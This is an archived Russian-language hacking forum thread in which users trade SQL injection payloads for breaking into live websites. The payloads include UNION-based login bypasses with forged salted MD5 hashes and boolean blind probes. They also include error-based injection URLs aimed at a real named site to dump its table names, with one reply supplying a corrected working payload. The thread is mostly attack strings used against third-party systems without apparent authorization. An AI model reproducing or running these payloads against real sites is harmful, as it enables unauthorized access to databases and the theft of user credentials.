ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.10.2011, 17:27
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
сегодня нашел сайтик:
в mysql.user
два пользователя root с разными хэшами...
как такое возможно? просто 2 пасса у рута?
|
|
|
25.10.2011, 17:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от M1lten
M1lten said:
Тоже, ошибки нет, но пишет что не правильный пароль.
Если что, могу кому-то в пм кинуть
Ну тогда примерно понятно, чо.
Знач так. Тащемта возмем за основу:
asd' union select 'pass', 'salt', 1, '1
/via кто-то там
Значит там сравнивается с пассом который ты шлешь. да.
Отсылать на скрипт будем пароль: "1"(без кавычек естественно)
думаю что выглядет в коде это как-то так:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Наш пароль: 1
"Наша" соль: 2
При авторизации пробуй слать:
Код:
Code:
Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), 2)) , 2, 1, 1 --
Пасс: 1
Или
Код:
Code:
//md5(md5(pass).md5(salt))
Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), MD5(2))) , 2, 1, 1 --
Пасс: 1
И так далее по алгоритмам.
Отчет ждем в тему
|
|
|
|
25.10.2011, 18:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
12753
Репутация:
0
|
|
Boolean, при запросах такова вида, выскакивает ошибка мускуля, а форма авторизации говорит что не верный пароль. И кстати, мб, пароль не шифруется, т.к. он даже в куках передается в открытом виде
|
|
|
|
25.10.2011, 18:43
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от M1lten
M1lten said:
Boolean
, при запросах такова вида, выскакивает ошибка мускуля, а форма авторизации говорит что не верный пароль. И кстати, мб, пароль не шифруется, т.к. он даже в куках передается в открытом виде
ты все варианты засолки то хоть перепробовал как тебе посоветовали?
Тем не менее, дай ссыль чтоль.
|
|
|
|
25.10.2011, 18:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
43818
Репутация:
0
|
|
Сорри за нубство мужики
Такой вопрос
1,2,..group_concat(login)...
...concat_ws(login)...
не хочет выполнять как можно обойти фильтр?
пробовал
group_concat(CHAR(108,111,103,105,110))
тоже не работает
|
|
|
|
25.10.2011, 19:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
12753
Репутация:
0
|
|
Сообщение от попугай
попугай said:
ты все варианты засолки то хоть перепробовал как тебе посоветовали?
Тем не менее, дай ссыль чтоль.
Вот, при таком запросе нет ошибки мускуля, и скрипт говорит что неверный пароль:
login = asd
pass = 1
Сообщение от None
asd' and 1=2 union select MD5(CONCAT(MD5(1), MD5(MD5(2)))) , 2, 1, 1 --
И при таком тоже ошибка пропадает и неверный пароль
Сообщение от None
asd' and 1=2 union select MD5(CONCAT(1, MD5(2))) , 2, 1, 1 --
Если не получится, скину.
|
|
|
|
25.10.2011, 20:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от crackforme
crackforme said:
Сорри за нубство мужики
Такой вопрос
1,2,..group_concat(login)...
...concat_ws(login)...
не хочет выполнять как можно обойти фильтр?
пробовал
group_concat(CHAR(108,111,103,105,110))
тоже не работает
http://www.mysql.ru/docs/maryan/#concat_ws
http://webi.ru/webi_articles/8_14_f.html
+ советую к прочтению http://raz0r.name/obzory/group_concat/
|
|
|
|
25.10.2011, 20:36
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
site/news.php?id=18 and 1=1 (true)
site/news.php?id=6+AND+ascii(lower(substring(user(),1,1 )))=111 (true)
site/news.php?id=18 and 1=3 (false)
site/news.php?id=18 and 'a'='a'
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''a'='a' LIMIT 0,1' at line 1 в функции view_field select title from news where id=18 and 'a'='a'
в чем суть ошибки? mq вроде бы off |
|
|
|
25.10.2011, 21:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Народ, а чё я делоаю не правильно?
http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+ta ble_name+from+information_schema.tables%29,floor%2 8rand%280%29*2%29%29having+min%280%29+or+1--+
чего мне не показывает таблицы?
|
|
|
|
25.10.2011, 21:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от qaz
qaz said:
Народ, а чё я делоаю не правильно?
http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+ta ble_name+from+information_schema.tables%29,floor%2 8rand%280%29*2%29%29having+min%280%29+or+1--+
чего мне не показывает таблицы?
Код:
Code:
http://english.in.ua/study.php?id=7/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
